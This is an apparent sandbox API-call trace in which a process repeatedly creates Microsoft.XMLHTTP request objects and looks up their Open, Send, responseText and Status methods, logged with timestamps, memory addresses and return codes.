	[0891.287] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0891.287] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0891.287] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c74f0) returned 0x0
	[0891.287] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0891.287] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74f0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5b58) returned 0x0
	[0891.287] ??2@YAPEAX_K@Z () returned 0x62f310
	[0891.287] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5b58, pUnkSite=0x62f310) 
	[0891.287] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0891.287] XMLHTTPRequest:IUnknown:Release (This=0x49c5b58) returned 0x0
	[0891.287] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74f0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c74f0) returned 0x0
	[0891.287] XMLHTTPRequest:IUnknown:AddRef (This=0x49c74f0) returned 0x3
	[0891.287] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74f0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0891.288] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74f0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0891.288] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74f0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0891.288] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0891.288] SysStringLen (param_1=0x0) returned 0x0
	[0891.288] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0891.288] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0891.288] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5ba0) returned 0x0
	[0891.288] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0891.288] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c68) returned 0x0
	[0891.288] ??2@YAPEAX_K@Z () returned 0x62f330
	[0891.288] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c68, pUnkSite=0x62f330) 
	[0891.288] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0891.288] XMLHTTPRequest:IUnknown:Release (This=0x49c5c68) returned 0x0
	[0891.289] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5ba0) returned 0x0
	[0891.289] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5ba0) returned 0x3
	[0891.289] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0891.289] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5ba0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0891.289] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0891.289] longjmp () 
	[0891.289] longjmp () 
	[0891.289] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0891.289] SysStringLen (param_1=0x0) returned 0x0
	[0891.289] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0891.290] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0891.290] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5c00) returned 0x0
	[0891.290] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0891.290] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7878) returned 0x0
	[0891.290] ??2@YAPEAX_K@Z () returned 0x62f310
	[0891.290] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7878, pUnkSite=0x62f310) 
	[0891.290] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0891.290] XMLHTTPRequest:IUnknown:Release (This=0x49c7878) returned 0x0
	[0891.290] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5c00) returned 0x0
	[0891.290] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5c00) returned 0x3
	[0891.290] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0891.290] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c00, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0891.291] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0891.291] longjmp () 
	[0891.291] longjmp () 
	[0891.291] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0891.291] SysStringLen (param_1=0x0) returned 0x0
	[0891.291] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0891.291] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0891.291] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5c60) returned 0x0
	[0891.291] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0891.291] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c60, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c74f8) returned 0x0
	[0891.291] ??2@YAPEAX_K@Z () returned 0x62f330
	[0891.291] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c74f8, pUnkSite=0x62f330) 
	[0891.292] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0891.292] XMLHTTPRequest:IUnknown:Release (This=0x49c74f8) returned 0x0
	[0891.292] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c60, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5c60) returned 0x0
	[0891.292] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5c60) returned 0x3
	[0891.292] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c60, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0891.292] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c60, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0891.292] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c60, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0891.292] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c60, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0891.292] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c60, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0891.293] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c60, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0897.875] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c60, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0897.875] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c60, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0897.875] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c60, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0897.876] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c60, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0897.876] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c60, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0897.876] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c60, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0905.412] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c60, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0905.412] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c60, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0905.412] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c60, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0905.413] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0905.413] SysStringLen (param_1=0x0) returned 0x0
	[0905.413] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0905.414] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0905.414] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5c60) returned 0x0
	[0905.414] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0905.414] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c60, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7878) returned 0x0
	[0905.414] ??2@YAPEAX_K@Z () returned 0x62f330
	[0905.414] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7878, pUnkSite=0x62f330) 
	[0905.414] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0905.414] XMLHTTPRequest:IUnknown:Release (This=0x49c7878) returned 0x0
	[0905.414] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c60, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5c60) returned 0x0
	[0905.414] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5c60) returned 0x3
	[0905.414] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c60, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0905.415] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c60, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0905.417] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c60, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0905.417] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0905.417] SysStringLen (param_1=0x0) returned 0x0
	[0905.417] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0905.418] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
